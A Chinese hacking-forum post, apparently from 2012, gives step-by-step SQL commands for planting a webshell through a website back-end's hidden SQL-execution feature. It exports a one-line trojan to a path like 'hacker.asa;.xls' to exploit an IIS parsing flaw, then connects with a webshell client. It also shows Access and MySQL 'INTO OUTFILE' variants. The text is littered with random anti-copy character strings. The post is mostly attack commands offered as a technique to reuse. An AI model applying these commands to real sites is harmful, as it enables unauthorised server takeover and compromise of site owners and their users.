好不容易进了后台,发现啥上传啊。备份啊多木有。7 G* e; B- _$ E2 f4 ?7 @
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
; S( C: u3 T7 _+ C2 k! Z$ \. W文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了," O- R% }* W7 m
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
6 v% l2 V1 J) d: i2 V' i% w* {1.create table cmd (a varchar(50))4 R" f3 \0 g+ z. T( g) n2 y( f
2.insert into cmd (a) values (‘‘)' c; R+ Q3 x- ^( Z& F$ \
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd, g5 L8 Y4 y9 ?; K" ^. H
(把表cmd的内容导出为物理路径的一个EXCEL文件)
3 i+ }! S$ ?% u& a8 h. u, C! X4.drop table cmd2 U) l+ T2 v5 H0 A5 K7 W5 w
利用IIS的BUG成功拿到了WEBSHELL。
* Q4 H V2 G( o( L' p6 e& r8 _! p3 b3 f8 b- _
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
- u8 U/ E/ j$ k$ C
( J b( x+ ?$ M8 s) ?! P9 b SQL语句意思解释:
# ^8 T8 M$ e' u! M' p5 u Z& H& O 第一句
# @) `/ _0 @# V% l3 U 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50 \4 u4 }2 w8 N3 r
: E I w% R, q% g, J
第二句
; E6 }+ O: m' x3 S, w2 Z 在表cmd的a字段插入一句话木马
1 J$ ?) \8 c$ z 第三句; d( v+ g2 m3 }
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件( f3 l) h; H+ u" a3 c1 u
( A( C8 k0 Y. Y% a# t5 a
第四句
$ R8 ?. ]1 `+ }$ p! Q6 \ 删除建立的cmd表" @7 }, E* g8 ]
* @* e) u3 h, ]# g+ b 以下内容为测试:
) i& \- z4 a$ \/ a8 G8 R Access利用后台SQL执行命令功能导出WebShell:
; {$ Z" I/ @; t- Q% N p0 o$ q4 z 这个更简单:
+ _% j' F- ?9 [3 ?' n2 _& Y, e% P8 c [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol] J2 \+ A( M' F$ R
或者
- r8 A- s# K. L5 w1 G& ^ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
8 j/ m V! d* W/ `: Q. z5 n% H( q3 I A/ ]% r# r o" B/ \
后台有执行SQL语句功能(vote为已知表段)
$ J5 n/ O. @+ {1 r1 A* C 希望对大家有所帮助拿shell的又一个思路" m% }7 S3 X" ^' {6 Q8 q
|
发表于 2012-9-13 17:53:58
收藏
支持
反对